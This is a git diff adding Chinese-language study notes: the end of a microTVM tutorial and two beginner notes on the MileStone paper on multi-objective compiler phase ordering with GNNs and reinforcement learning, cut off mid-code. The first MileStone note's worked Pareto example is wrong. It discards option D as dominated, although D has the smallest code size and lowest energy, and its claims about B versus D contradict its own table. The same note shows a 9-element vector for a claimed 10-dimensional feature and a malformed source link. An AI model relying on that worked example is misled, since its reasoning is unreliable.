`(graph_json, lib, params)` 三元组会被打包成 **MLF** 标准目录,便于 CI 与 Project API 消费。典型结构包括: + +- `codegen/target/src/*.c` — 算子与元数据 C 源码 +- `parameters/*.params` — Relay 权重 +- `runtime-config/aot/` 或 `graph/graph.json` — 执行器配置 +- `metadata.json` — 目标、runtime、外部依赖(如 standalone CRT 头文件列表) + +MLF 是「**中央厨房出库的半成品箱**」:不关心你最后用的是 Zephyr 还是 Arduino,箱内格式统一。 + +### 4. Host-Driven vs Standalone + +| 模式 | 推理控制端 | 固件内含 | 典型用途 | +|------|------------|----------|----------| +| **Host-Driven** | 主机上的 Graph/AOT Executor | CRT + RPC Server | 开发调试、AutoTVM 调优、快速迭代 | +| **Standalone** | 设备 `main()` 直接调 `run()` | CRT + 编译进设备的执行逻辑 | 量产后脱机运行 | + +Host-Driven 时,主机通过 UART/USB 发 RPC:**「把这块输入 tensor 拷进去,跑第 7 号算子」**——设备像远程协处理器。Standalone 则把 AOT 生成的 `run()` 和权重全部链进 Flash,上电即推理。 + +### 5. Project API 与模板工程 + +裸 `relay.build` 产物还不能直接烧录。microTVM 用 **Project API** 把 MLF 注入平台模板: + +- `crt` / `host` — x86 仿真 +- `zephyr` — STM32、nRF 等 Zephyr 板 +- `arduino` — Nano 33 BLE 等 + +模板根目录有 `microtvm_api_server.py`,负责 `generate_project` → `build` → `flash` → 暴露 `transport()` 给 `tvm.micro.Session`。 + +### 6. TVMC Micro 命令行 + +不想写 Python 时,可用 **TVMC Micro** 一条龙(需先 `tvmc compile` 出 MLF): + +```bash +# 生成 Zephyr 工程 +tvmc micro create project mlf.tar zephyr \ + --project-option zephyr_board=qemu_x86 + +# 编译固件 +tvmc micro build project zephyr --project-option zephyr_board=qemu_x86 + +# 烧录后在主机侧跑推理 +tvmc run --device micro project/model.tar --device-key micro0 +``` + +适合 CI 里「编译 → 仿真板跑 golden」的流水线。 + +## 代码示例一:TFLite → Relay → AOT → Host-Driven 推理 + +下列流程浓缩自官方 [microTVM Host-Driven AoT](https://tvm.apache.org/docs/how_to/work_with_microtvm/micro_aot.html) 教程:在 `host` target 上用 CRT 跑通,再换板级 target 即可迁移。 + +```python +import json +import pathlib +import numpy as np +import tvm +from tvm import relay +from tvm.relay.backend import Executor, Runtime + +# 1. 导入 TFLite(也可用 ONNX / PyTorch) +tflite_model = open("mobilenet_v1_0.25_128_quant.tflite", "rb").read() +shape_dict = {"input": [1, 128, 128, 3]} +relay_mod, params = relay.frontend.from_tflite(tflite_model, shape_dict=shape_dict) + +# 2. micro target + CRT + AOT +TARGET = tvm.target.target.micro("host") +RUNTIME = Runtime("crt", {"system-lib": True}) +EXECUTOR = Executor("aot") + +with tvm.transform.PassContext(opt_level=3, config={"tir.disable_vectorize": True}): + module = tvm.relay.build( + relay_mod, target=TARGET, params=params, runtime=RUNTIME, executor=EXECUTOR + ) + +# 3. 用 Project API 生成可构建工程 +template = pathlib.Path(tvm.micro.get_microtvm_template_projects("crt")) +project_dir = pathlib.Path("/tmp/microtvm_aot_project") +project = tvm.micro.generate_project( + template, + module, + project_dir, + {"project_type": "host_driven"}, +) + +# 4. 构建并通过 Session 跑 AOT Executor +project.build() +with tvm.micro.Session(project.transport()) as session: + aot = tvm.runtime.executor.aot_executor.AotModule(session.create_aot_executor()) + sample = np.load("sample_input.npy") + aot.get_input("input").copyfrom(sample) + aot.run() + logits = aot.get_output(0).numpy() + print("predicted class:", int(np.argmax(logits))) +``` + +要点:**AOT 不在运行时解析 graph.json**,workspace 在编译期规划,适合 RAM 紧张的 MCU。 + +## 代码示例二:Graph Executor + Zephyr 物理板 + +Host-Driven Graph 模式更接近「主机当导演、设备当演员」,与 AutoTVM 历史集成最深。下面展示 Session + `create_local_graph_executor` 形态(摘自 [TFLite microTVM 教程](https://tvm.apache.org/docs/how_to/work_with_microtvm/micro_tflite.html) 思路): + +```python +import numpy as np +import tvm +from tvm import relay +from tvm.relay.backend import Executor, Runtime + +# 极简 sin 回归模型(MCU 友好) +def build_sin_model(): + x = relay.var("input", shape=(1,), dtype="float32") + y = relay.nn.dense(relay.reshape(x, (1, 1)), relay.const(np.zeros((1, 8), "float32"))) + y = relay.nn.relu(y) + y = relay.nn.dense(y, relay.const(np.zeros((8, 1), "float32"))) + mod = tvm.IRModule.from_expr(relay.Function([x], y)) + params = {} # 实际应加载训练权重 + return mod, params + +relay_mod, params = build_sin_model() +TARGET = tvm.target.target.micro("nucleo_f746zg") # Zephyr 板级 model +RUNTIME = Runtime("crt", {"system-lib": True}) +EXECUTOR = Executor("graph", {"link-params": True}) + +with tvm.transform.PassContext(opt_level=3, config={"tir.disable_vectorize": True}): + module = tvm.relay.build( + relay_mod, target=TARGET, params=params, runtime=RUNTIME, executor=EXECUTOR + ) + +import pathlib +zephyr_tpl = pathlib.Path(tvm.micro.get_microtvm_template_projects("zephyr")) +project = tvm.micro.generate_project( + zephyr_tpl, + module, + pathlib.Path("/tmp/zephyr_sin"), + {"project_type": "host_driven", "zephyr_board": "nucleo_f746zg"}, +) +project.build() +project.flash() + +with tvm.micro.Session(project.transport()) as session: + graph_mod = tvm.micro.create_local_graph_executor( + module.get_graph_json(), + session.get_system_lib(), + session.device, + ) + graph_mod.set_input(**module.get_params()) + graph_mod.set_input("input", tvm.nd.array(np.array([0.5], dtype="float32"))) + graph_mod.run() + print("sin(0.5) ≈", graph_mod.get_output(0).numpy()) +``` + +`create_local_graph_executor` 的「local」指图调度在**主机**,重算子在**设备**执行——调试时可在 PC 上打断点看 RPC 轨迹。 + +## 自动调优与 CMSIS-NN + +microTVM 一大差异化能力是 **AutoTVM / Meta Schedule**:在真实板子(或 QEMU)上测量算子耗时,搜索 tile size、unroll 等 schedule。 + +- 设备端跑 RPC server,主机发 `tvm.contrib.autotvm` 测量任务。 +- 对 Arm Cortex-M,可启用 **CMSIS-NN BYOC**,让特定算子落到 hand-tuned 汇编内核,再由 TVM 做图级融合。 + +这与「只换 `.tflite` 数组」的 TFLM 不同:**同一模型可针对每块板重新调 schedule**,代价是离线调优时间更长。 + +## 支持硬件与开发环境 + +官方 CI 主要覆盖 **Cortex-M + Zephyr RTOS**,但不限于 Zephyr,也面向 **RISC-V** 等架构。文档列出的参考板包括: + +- STM32 Nucleo-F746ZG / STM32F746 Discovery +- nRF5340 DK + +无物理板时可: + +1. 用 `target.micro("host")` + CRT 在 x86 仿真; +2. 用 Zephyr `qemu_x86` / `qemu_cortex_m3` 目标; +3. 用 **microTVM Reference VM**(Vagrant)预装 Zephyr 依赖,复现 bug 与教程。 + +构建 TVM 时需打开 CMake 选项(示例): + +```cmake +set(USE_MICRO ON) +set(USE_MICRO_STANDALONE_RUNTIME ON) +``` + +## microTVM vs TFLite Micro:怎么选 + +| 维度 | microTVM | TFLite Micro | +|------|----------|--------------| +| 模型入口 | Relay 多前端(TFLite/ONNX/PyTorch…) | 主要 `.tflite` | +| 执行模型 | AOT/Graph 编译 + CRT | 解释器 + FlatBuffer | +| 调优 | AutoTVM/Meta Schedule + BYOC | 厂商内核替换(如 CMSIS-NN) | +| 上手曲线 | 陡(需懂 TVM target/MLF/Project API) | 平缓(MicroInterpreter API 固定) | +| 生态成熟度 | 持续演进,API 变动需跟版本 | 产品化案例多(Google/Arm 文档全) | + +实践上常见组合:**训练导出 TFLite → TVM 导入 Relay → microTVM 编译 + CMSIS-NN**,兼得 TFLite 工具链与 TVM 调度优势。 + +## 常见坑与排错 + +1. **忘记 `tir.disable_vectorize`**:Cortex-M 无 NEON 时向量化可能生成非法指令或更大代码体积。 +2. **Runtime 用错**:micro 上误用默认 C++ Runtime 会导致链接失败或体积暴涨。 +3. **Arena / workspace 不足**:AOT metadata 会声明 workspace 大小;Standalone 需在 `main.c` 里分配足够 `uint8_t workspace[]`。 +4. **Zephyr 版本不匹配**:社区示例常钉死某分支(如 2.7),升级前查 TVM 发行说明。 +5. **Host-Driven 串口权限**:Linux 上需将用户加入 `dialout`,VM 需 USB passthrough(Reference VM 文档强调)。 + +## 延伸阅读 + +- [microTVM 主题页](https://tvm.apache.org/docs/topic/microtvm/index.html) — 总览与教程索引 +- [microTVM Design Document](https://tvm.apache.org/docs/arch/microtvm_design.html) — Host-Driven / Standalone 固件组成 +- [Model Library Format RFC](https://discuss.tvm.apache.org/t/rfc-tvm-model-library-format/9121) — MLF 目录规范 +- [microTVM TFLite 教程](https://tvm.apache.org/docs/how_to/work_with_microtvm/micro_tflite.html) +- [TVMC Micro CLI](https://tvm.apache.org/docs/how_to/work_with_microtvm/micro_tvmc.html) +- 对比阅读:[TensorFlow Lite Micro 论文笔记](./tflite-micro-2021.md)、[Zephyr RTOS 概览](./zephyr-rtos-overview.md) + +## 一句话总结 + +**microTVM = 在「只有 C 库、没有 OS」的 MCU 上,用 TVM 编译器把神经网络变成可烧录的 C 固件,并可选地通过 RPC 做主机驱动推理与自动调优**——它不是又一个小解释器,而是把「编译 + 调优」那套服务器级能力,压缩进 TinyML 的厨房流水线里。 diff --git a/src/content/docs/papers/milestone-multi-objective-compiler-phase-ordering-arxiv-2605-23435.md b/src/content/docs/papers/milestone-multi-objective-compiler-phase-ordering-arxiv-2605-23435.md new file mode 100644 index 000000000..1f2aaf807 --- /dev/null +++ b/src/content/docs/papers/milestone-multi-objective-compiler-phase-ordering-arxiv-2605-23435.md @@ -0,0 +1,299 @@ +--- +title: "MileStone 学习笔记:用 AI 解决编译器优化排序问题" +来源: https://arxiv.org/abs/2605-23435 +日期: 2026-06-13 +分类: 编程语言 +子分类: 类型与 PL 理论 +provenance: pipeline-v3 +--- + +# MileStone:用 AI 解决编译器优化排序问题 + +## 一、从做饭说起:什么是"优化排序" + +想象你在做一道菜。你可以加盐、可以大火炒、可以切小块、可以慢炖——每一个步骤都叫一个"优化手段"(optimization pass)。 + +关键问题来了:**步骤顺序重要吗?** + +- 先切小块再洗 vs. 先洗再切小块——结果完全不同 +- 先大火炒再加盐 vs. 先加盐再大火炒——味道天差地别 + +编译器也是一样的。它把人类写的代码(比如 C、Rust)翻译成机器能跑的指令,中间要经过很多"优化步骤":把循环展开、把函数内联、把变量合并……**这些步骤按什么顺序执行,直接决定程序跑得快不快、占不占内存、耗不耗电。** + +传统编译器的做法是:给你几个固定选项,比如 `-O1`(轻度优化)、`-O2`(中度)、`-O3`(激进)。但这就像餐厅只给你"少盐、正常、多盐"三个选项——太粗糙了。 + +**MileStone 要解决的核心问题就是:给定一堆优化步骤,怎样排出一个最优顺序?** + +## 二、为什么这个问题很难 + +### 2.1 搜索空间巨大 + +假设有 10 个优化步骤,它们能排出的顺序有 10! = 3,628,800 种。如果增加到 20 个步骤,就是 20! ≈ 2.4 × 10¹⁸ 种可能。这还没算每个步骤可以选"用"或"不用",组合数会爆炸式增长。 + +### 2.2 目标之间会打架 + +你可能希望程序**跑得快**、**占内存小**、**耗电少**。但这三个目标经常互相矛盾: + +- 把循环展开(loop unrolling)能让程序更快,但生成的代码会变长,占更多内存 +- 开启向量优化(vectorization)能大幅提升速度,但会增加能耗 + +这就引出了一个重要概念:**帕累托最优(Pareto Optimal)**。 + +### 2.3 帕累托最优是什么? + +想象你在挑手机,有两个维度:性能和电池续航。 + +- 手机 A:性能强但续航差 +- 手机 B:性能弱但续航好 +- 手机 C:性能和续航都不错 + +手机 C 就"碾压"了 A 和 B——A 和 B 被称为"被支配"的选项。而 A、B 之间没法简单说谁更好,因为它们各有各的优劣。所有这种"没法被碾压"的手机组成的集合,就叫**帕累托最优解集**。 + +MileStone 的目标不是找出唯一最优解,而是找出一组帕累托最优的排序方案,让用户根据自己的需求来选。 + +## 三、MileStone 的核心架构 + +MileStone 由四个模块组成,像一条流水线: + +``` +源代码 → Graph Generator → GNNPP(性能预测) → RLMOE(优化探索) → 最优排序方案 + ↑ ↓ + └──────────── RLDBG(自进化数据库) ←────┘ +``` + +### 3.1 Graph Generator(图生成器) + +编译器内部有一种中间表示(IR),叫 LLVM IR。MileStone 把 LLVM IR 转换成一种**图**(Control and Data Flow Graph, CDFG): + +- 图中的每个**节点**代表一条指令 +- 图中的每条**边**代表指令之间的依赖关系 + +举个例子,这段简单的 C 代码: + +```c +int a = 5; +int b = 10; +int c = a + b; +``` + +在 CDFG 中大致长这样: + +``` + [alloca a] ──→ [store 5 → a] ──→ [load a] ──┐ + → [add a, b → c] + [alloca b] ──→ [store 10 → b] ─→ [load b] ──┘ +``` + +这样做的好处是:编译器不再"看"代码的文本,而是"看"代码的结构——就像从看菜谱的文字描述,变成了看菜谱的流程图。 + +### 3.2 GNNPP(基于 GNN 的性能预测器) + +**GNN** = Graph Neural Network(图神经网络)。 + +你可能听过 CNN(卷积神经网络),它擅长处理图片。但图片是规则的网格,而 CDFG 是不规则的图——每个节点的邻居数量不同,也没有固定的空间顺序。CNN 处理不了这种数据。 + +GNN 的做法是:**让每个节点跟邻居"聊天"**。每一轮,节点收集邻居的信息,更新自己的"理解"。多聊几轮之后,每个节点就包含了周围很大范围的信息。 + +具体到 MileStone: + +1. 每个节点被编码成一个 10 维向量 +2. 第一维表示节点类型(基本块 or 指令) +3. 后九维用 one-hot 编码表示指令类型(加法、乘法、内存加载等) + +```python +# 节点特征编码示例 +# 一条 "add" 指令的节点特征 +add_node_feature = [ + 0, # 不是基本块(是指令) + 0, 0, 0, # alloca: no + 0, 0, # load/store: no + 1, 0, 0 # add: yes (乘法、除法、icmp、call 都是 0) +] +``` + +GNN 经过多层"聊天"后,用**平均池化**(mean pooling)把图中所有节点的信息汇总成一个向量,这就是整个程序的"图嵌入"(graph embedding)。 + +最后,通过一个全连接网络,预测三个指标:代码大小、执行时间、能耗。MileStone 用了三个独立的 GNN 模型,每个预测一个指标。 + +### 3.3 RLMOE(基于强化学习的优化探索器) + +这是 MileStone 的大脑部分。 + +**强化学习(RL)** 的核心概念: + +| 概念 | 含义 | 类比 | +|------|------|------| +| State(状态) | 当前局面 | 做菜进行到哪一步了 | +| Action(动作) | 做出的决策 | 下一步放什么调料 | +| Reward(奖励) | 反馈分数 | 菜好不好吃 | +| Policy(策略) | 决策规则 | 你的做菜经验 | + +RLMOE 把优化排序问题建模成一个**马尔可夫决策过程(MDP)**: + +- **状态**:当前 CDFG 的图嵌入 + 元数据 + 用户指定的能耗约束 +- **动作**:对当前节点应用哪个优化指令(比如"尝试内联"或"跳过") +- **奖励**:只在最后一步给出,惩罚代码大小、惩罚执行时间、惩罚偏离目标能耗 + +奖励公式的核心思想: + +``` +奖励 = -(代码大小权重 × 代码大小) - (能耗偏差权重 × 能耗偏差) - (执行时间权重 × 执行时间) +``` + +奖励是负的,所以 RL 的目标就是让奖励"尽可能大"(也就是负得尽可能少,即代价尽可能小)。 + +MileStone 支持两种 RL 算法: + +- **DQN**:学习"在每个状态下,哪个动作最好" +- **PPO**:直接学习"在某个状态下,选每个动作的概率" + +实验表明,对于复杂的大型程序,PPO 比 DQN 效果更好。 + +### 3.4 RLDBG(自进化数据库) + +RLMOE 在探索过程中,会把每次尝试的结果记录下来: + +- 用了哪些优化步骤 +- 排序是什么 +- 最终代码大小、执行时间、能耗各是多少 + +这些数据形成数据库,反过来训练 GNNPP,让预测更准。预测更准了,RLMOE 探索得更快。这是一个正向循环。 + +## 四、代码示例 + +### 示例 1:GNNPP 的图嵌入流程 + +伪代码展示一个 CDFG 如何被变成性能预测: + +```python +class GNNPP(nn.Module): + """GNN 性能预测器""" + + def __init__(self, node_dim=10, hidden_dim=64): + super().__init__() + # GCN 层:让节点互相"聊天" + self.gcn1 = GCNLayer(node_dim, hidden_dim) + self.gcn2 = GCNLayer(hidden_dim, hidden_dim) + # 预测头:三个独立的模型 + self.head_size = MLP(hidden_dim, 1) # 预测代码大小 + self.head_time = MLP(hidden_dim, 1) # 预测执行时间 + self.head_energy = MLP(hidden_dim, 1) # 预测能耗 + + def forward(self, adj, node_features): + # 第一层 GCN:节点开始收集邻居信息 + h = self.gcn1(node_features, adj) + h = leaky_relu(h) + # 第二层 GCN:节点收集"邻居的邻居"的信息 + h = self.gcn2(h, adj) + h = leaky_relu(h) + # 平均池化:把所有节点信息压缩成一个向量 + graph_embedding = mean_pooling(h) + # 分别预测三个指标 + code_size = self.head_size(graph_embedding) + exec_time = self.head_time(graph_embedding) + energy = self.head_energy(graph_embedding) + return code_size, exec_time, energy +``` + +### 示例 2:RLMOE 的核心训练循环 + +伪代码展示强化学习探索器如何工作: + +```python +def training_loop(cdfg_index, energy_target, episodes=3000): + for episode in range(episodes): + # 初始化:所有节点都还没有分配优化指令 + state = build_initial_state(cdfg_index, energy_target) + + for step in range(total_nodes): + # RL 智能体观察当前状态,选择动作 + # DQN 用 ε-greedy 策略探索 + action = rl_agent.select_action(state) + + # 执行动作:把优化指令应用到当前节点 + next_state = apply_action(state, action) + + # 中间步骤没有奖励,只在最后一步评估 + if step == total_nodes - 1: + # 用 GNNPP 快速预测性能指标 + code_size, exec_time, energy = gnnpp.predict(state) + + # 计算奖励(负值,越小越好) + reward = -( + alpha * code_size + + beta * abs(energy - energy_target) + + lambda_ * exec_time + ) + + state = next_state + + # 用奖励更新 RL 智能体 + rl_agent.update(state, action, reward) +``` + +### 示例 3:帕累托最优的比较 + +假设 MileStone 为同一段代码找到了四种排序方案: + +``` +方案 执行时间 代码大小(KB) 能耗(J) +A 1.2s 200 5.0 +B 1.4s 150 2.0 +C 1.0s 300 8.0 +D 2.0s 100 1.5 +``` + +分析: +- A 比 D 更快,A 的能耗更低 → **D 被 A 支配**,排除 D +- B 和 A 比较:B 更慢但更小更省电,无法简单比较 +- C 和 A 比较:C 更快但代码大得多、能耗高很多,无法简单比较 +- B 比 D 更快、更大、更耗电 → **D 也被 B 支配**,排除 D + +最终帕累托最优解集是:{A, B, C}。用户可以根据实际需求选择:嵌入式设备选 B,高性能服务器选 C。 + +## 五、实验结果 + +MileStone 在 PolyBench 基准测试上做了实验,关键结果: + +| 指标 | MileStone-PPO | LLVM -O3 | 提升幅度 | +|------|---------------|----------|----------| +| 能耗约束匹配率 | 90-92% | 3-9% | 约 10-30 倍 | +| 同等能耗下的执行时间减少 | - | 基准 | **最多 45%** | +| 相比传统方法(GA/PSO) | - | 64-68% 匹配率 | 高出约 25% | + +几个重要发现: + +1. GNN 用 2 层 GCN 是最优的。层数再多会导致"过平滑"(oversmoothing)——节点的表示变得太相似,失去了区分度 +2. PPO 在大型程序上优于 DQN,因为 DQN 的 critic 在状态空间变大时难以准确估计价值 +3. 不同 μ 值(代码大小 vs 执行时间的权重)能灵活切换优化倾向 + +## 六、MileStone 的独特之处 + +把 MileStone 和其他方法对比: + +| 方法 | 多目标优化 | 图表示 | 搜索空间 | +|------|-----------|--------|----------| +| **MileStone** | ✅ 是 | ✅ CDFG 图 | ✅ 无限制 | +| MiCOMP | ❌ 单目标 | ❌ 序列编码 | 有限 | +| POSET-RL | ❌ 单目标 | ❌ IR2Vec | 有限 | +| Shackleton | ❌ 单目标 | ❌ | ✅ 无限制 | + +MileStone 是目前唯一一个同时具备**图表示 + 真正多目标优化 + 无限制搜索空间**的方法。 + +## 七、总结 + +MileStone 的核心思路可以浓缩成一句话: + +> **用图神经网络理解程序结构,用强化学习探索优化排序,用多目标优化找到帕累托最优的平衡点。** + +它把编译器优化从"工程师凭经验排步骤"变成了"AI 自动找最优解",而且这个最优解不是单一的,而是一组可供用户选择的帕累托最优方案。 + +对于一个零基础的学习者来说,记住三个关键词就够了: + +1. **图**——把代码变成节点和边的关系图 +2. **GNN**——让 AI 从图中学习程序的结构特征 +3. **强化学习**——让 AI 像玩游戏一样,试出最优的优化步骤排序 + +--- + +*参考论文:Amirhosein Sadr, Mehran Alidoost Nia. "MileStone: A Multi-Objective Compiler Phase Ordering Framework for Graph-based IR-Level Optimization." PLDI '26, arXiv:2605.23435.* diff --git a/src/content/docs/papers/milestone-phase-order.md b/src/content/docs/papers/milestone-phase-order.md new file mode 100644 index 000000000..55128cba2 --- /dev/null +++ b/src/content/docs/papers/milestone-phase-order.md @@ -0,0 +1,343 @@ +--- +title: MileStone — 多目标编译器 Phase Ordering(GNN + RL)零基础学习笔记 +来源: https://arxiv.org/abs/2605.23435 +日期: 2026-06-13 +分类: 编程语言 +子分类: 类型与 PL 理论 +provenance: pipeline-v3 +--- + +## 从日常类比开始:做菜工序 vs 固定菜谱 + +想象你在经营一家**中央厨房**,要把同一批食材做成成品菜。厨房里有几十种工序:切配、腌制、焯水、爆炒、蒸、烤、装盘……每种工序都会改变食材的状态,而且**先后顺序**极其重要——先腌后切和先切后腌,口感完全不同;过度爆炒会让体积膨胀(代码变大),过度蒸制会耗电但省火工(能耗与时间的权衡)。 + +传统编译器给你的是**固定套餐**: + +- `-O1`:家常快手菜 +- `-O2`:标准宴席 +- `-O3`:追求极致速度,往往牺牲体积和能耗 + +这三档只是巨大搜索空间里的**三个点**。真实场景更复杂:手机 App 要控制安装包体积;IoT 设备电池只有 200 mAh,必须在**能耗上限**内尽量快;数据中心又要吞吐优先。你很少只关心单一指标。 + +**Phase Ordering Problem(阶段排序问题)** 就是:给定一堆 LLVM/GCC 优化 pass(内联、循环展开、向量化、死代码消除……),找到**一串顺序**,让最终程序在多个目标上同时表现良好。 + +穷举所有 pass 排列?组合爆炸,不现实。每个候选序列都真机跑一遍 profiling?太慢。 + +**MileStone**(Shahid Beheshti University,[arXiv:2605.23435](https://arxiv.org/abs/2605.23435),PLDI 2026)的做法像雇了两位助手: + +1. **品菜师(GNN)**:看一眼当前「食材关系图」(LLVM IR 的控制流+数据流图 CDFG),不用真下锅,就能**预测**做完某套工序后的执行时间、代码体积、能耗。 +2. **排班经理(RL)**:在品菜师反馈下,逐步决定每个节点该偏向「缩体积」还是「抢速度」,并在用户给的**能耗预算**内探索 Pareto 最优折中。 + +论文摘要报告:在相同能耗预算下,执行时间最多可降低约 **45%**;且无需穷举搜索或动态 profiling 也能找到多目标 Pareto 前沿。 + +一句话:**用图神经网络当廉价性能预言机,用强化学习当多目标排程器,解决编译器 pass 顺序怎么排。** + +--- + +## 是什么 + +| 项目 | 内容 | +|------|------| +| 论文 | MileStone: A Multi-Objective Compiler Phase Ordering Framework for Graph-based IR-Level Optimization | +| 作者 | Amirhossein Sadr, Mehran Alidoost Nia | +| 机构 | Shahid Beheshti University(伊朗) | +| 发表 | PLDI 2026(ACM SIGPLAN) | +| arXiv | [2605.23435](https://arxiv.org/abs/2605.23435) | +| 关键词 | Compiler Optimization, Multi-Objective Optimization, Phase Ordering, GNN, RL | +| 目标平台 | LLVM IR 层(前端编译后提取 CDFG) | +| 优化指标 | 执行时间(ExecTime)、代码体积(CodeSize)、能耗(Energy) | + +名字 **MileStone** 有两层含义:流水线被拆成「图提取 → 数据库构建 → 预测 → 多目标探索」等里程碑;同时在执行时间/体积/能耗的 trade-off 空间里,标出 Pareto 最优的「里程碑点」。 + +--- + +## 为什么重要 + +### 1. `-O3` 不是万能答案 + +`-O3` 会激进内联、循环展开、自动向量化——通常更快,但**代码膨胀**、**功耗上升**。嵌入式、边缘 AI、电池设备往往不能接受。固定优化级别无法表达「在 3J 能耗以内尽量快」这类**带约束的多目标**需求。 + +### 2. 单目标学习方法不够用 + +已有工作(Autophase、CompilerGym、MLComp 等)多用 RL 或监督学习找 pass 序列,但常见局限: + +- 只优化**执行时间**或**代码大小**之一 +- 依赖**动态 profiling**(真编译+真跑),样本效率低 +- 把多目标硬塞进加权标量和,丢失 Pareto 前沿多样性 + +MileStone 把问题形式化为**约束多目标优化(CMOO)**,显式探索 Pareto 前沿。 + +### 3. GNN + RL 分工明确 + +| 组件 | 角色 | 类比 | +|------|------|------| +| GNNPP | 静态预测三个指标 | 品菜师:看菜谱结构猜结果 | +| RLMOE | 探索 pass/指令级决策 | 排班经理:试不同工序组合 | +| RLDBG | 自进化数据库 | 配方档案室:越积越准 | +| GG | LLVM IR → CDFG | 把厨房现状画成关系图 | + +GNN 提供**廉价反馈**,RL 不必每步都真编译,训练收敛更快。 + +--- + +## 核心概念 + +### 1. Compiler Pass 与 Phase Ordering + +现代编译器(LLVM、GCC)把优化拆成可插拔的 **pass**:`inline`、`loop-unroll`、`vectorize`、`dce`……每个 pass 读写 IR。Pass **顺序**影响最终效果,且 pass 之间可能互相增强或抵消(例如先 DCE 再 inline vs 反过来)。 + +搜索空间大小随 pass 数量呈阶乘级增长;`-O1/-O2/-O3` 只是人工挑出的几条路径。 + +### 2. CDFG(Control and Data Flow Graph) + +MileStone 不直接喂源代码文本,而是从 **LLVM IR** 提取 **CDFG**: + +- **节点**:基本块节点 + 指令节点(`alloca`、`load`、`store`、`add`、`call` 等) +- **边**:控制流边 + 数据依赖边 + +这样程序结构(循环、分支、调用关系)和语义(算术、内存操作)都编码进图里,适合 GNN 做 message passing。 + +### 3. GNNPP:图卷积性能预测器 + +每个节点用 **10 维二元特征向量**: + +- 第 1 维:基本块 vs 指令 +- 后 9 维:常见 LLVM opcode 的 one-hot(`alloca/load/store/add/sub/mul/div/icmp/call`) + +多层 **GCN(Graph Convolutional Network)** 做邻居聚合,mean pooling 得到图级 embedding,再接三层全连接 + LeakyReLU,分别预测 **CodeSize、Energy、ExecTime**(三个结构相同、权重独立的 GNN)。 + +推理时三个 embedding 各 64 维,拼接成 **192 维** 向量,再拼 CDFG 元数据(节点数、边数、乘法次数等),作为 RL 的状态输入。 + +### 4. RLMOE:强化学习多目标探索器 + +把 phase ordering 建模为 **MDP**: + +| MDP 元素 | MileStone 中的含义 | +|----------|-------------------| +| 状态 \(s_t\) | 部分赋值的 CDFG + 192 维 embedding + 当前节点 ID + 能耗约束 | +| 动作 \(a_t\) | 对当前节点选择优化取向(如偏代码大小 vs 偏执行时间) | +| 转移 | 逐步为 CDFG 节点分配 directive,直到完整方案 | +| 奖励 \(r_t\) | 中间步为 0;**最后一步**用 GNN 预测值算综合奖励 | + +奖励与优化目标(论文公式 2、4)对齐。在用户指定能耗目标 \(Energy_{target}\) 下,最小化: + +\[ +U(\text{CodeSize}, \text{ExecTime} \mid Energy_{target}) = \mu \frac{\text{CodeSize}}{q} + (1-\mu)\,\text{ExecTime} +\] + +终端奖励形如: + +\[ +r_T = -\alpha \cdot \text{CodeSize}_p - \beta \cdot |Energy_t - Energy_p| - \lambda \cdot \text{ExecTime}_p +\] + +其中 \(\alpha = \mu/q\),\(\lambda = 1-\mu\),\(p\) 表示 GNN 预测值。算法可用 **DQN** 或 **PPO**。 + +### 5. RLDBG:自进化数据库 + +闭环训练的数据来源: + +1. RLMOE 探索大量 pass 配置 +2. Evaluator **真编译 + profiling** 得到 ground truth +3. 存入数据库:IR、CDFG、实测指标 +4. 用这些数据**监督训练 GNNPP** +5. 更准的 GNN → 更快的 RL 反馈 → 更多高质量样本 + +论文强调捕获 **Pareto 高效** 结果,减少重复 profiling。 + +### 6. Pareto 最优与能耗约束 + +两个方案 A、B: + +- A:1.2 s,5 J +- B:1.4 s,2 J + +对电池供电 MCU,B 可能更优——尽管更慢。MileStone 在**用户能耗约束**下找非支配解集(Pareto front),而不是单一「最快」答案。 + +--- + +## 四模块架构(工作流) + +```text +LLVM 前端 IR + │ + ▼ +┌─────────────┐ +│ GG │ Graph Generator:提取 CDFG +└──────┬──────┘ + │ + ├──────────────────────────────────┐ + ▼ ▼ +┌─────────────┐ ┌─────────────┐ +│ RLDBG │◄──探索/标注───────│ RLMOE │ +│ 自进化 DB │ │ RL 探索器 │ +└──────┬──────┘ └──────▲──────┘ + │ 训练数据 │ 预测反馈 + ▼ │ +┌─────────────┐──────────────────────────┘ +│ GNNPP │ 三头 GNN 预测 Size/Energy/Time +└─────────────┘ +``` + +**训练阶段**:RLDBG 驱动探索 → 标注 CDFG → 训练 GNNPP → GNN 加速 RLMOE 策略学习。 + +**推理阶段**:新程序 → GG 出图 → GNNPP 嵌入 → RLMOE 在约束下输出 pass 策略 → Pareto 里程碑解。 + +--- + +## 代码示例 1:从 LLVM IR 概念构造 CDFG 节点特征 + +下面用 Python **伪代码**说明论文中 10 维节点特征如何编码(便于理解 GNN 输入,非官方实现): + +```python +# MileStone GNNPP 节点特征:10 维二元向量 +OPCODES = ["alloca", "load", "store", "add", "sub", "mul", "div", "icmp", "call"] + +def node_features(node) -> list[int]: + """将 CDFG 节点编码为 10 维特征(论文 §4.2.1)""" + feats = [0] * 10 + if node.kind == "basic_block": + feats[0] = 1 # 基本块节点 + return feats + # 指令节点 + feats[0] = 0 + if node.opcode in OPCODES: + feats[1 + OPCODES.index(node.opcode)] = 1 + return feats + +# 示例:一条 store 指令节点 +store_node = {"kind": "instruction", "opcode": "store"} +print(node_features(store_node)) +# [0, 0, 0, 1, 0, 0, 0, 0, 0, 0] → store 在索引 3(1+2) + +# 示例:基本块入口 +bb_node = {"kind": "basic_block"} +print(node_features(bb_node)) +# [1, 0, 0, 0, 0, 0, 0, 0, 0, 0] +``` + +要点:结构(块 vs 指令)和语义(opcode)分开编码,让 GCN 能区分控制流骨架与计算操作。 + +--- + +## 代码示例 2:终端奖励与多目标标量(对齐论文公式) + +```python +def milestone_terminal_reward( + code_size_p: float, # GNN 预测代码体积 + exec_time_p: float, # GNN 预测执行时间 + energy_p: float, # GNN 预测能耗 + energy_target: float, # 用户能耗预算 + mu: float = 0.5, # 代码体积 vs 时间的权重 + q: int = 1000, # 体积量纲缩放 + beta: float = 1.0, # 能耗偏差惩罚 +) -> float: + """ + 对应 MileStone 公式 (2)(4) 的终端奖励(RL 只在最后一步非零)。 + RL 最大化累计奖励 → 等价于最小化加权目标 + 能耗约束偏差。 + """ + alpha = mu / q + lam = 1.0 - mu + penalty_energy = abs(energy_target - energy_p) + return -( + alpha * code_size_p + + lam * exec_time_p + + beta * penalty_energy + ) + +# 场景:IoT 设备能耗预算 2J,更在意能耗达标 +r = milestone_terminal_reward( + code_size_p=12000, + 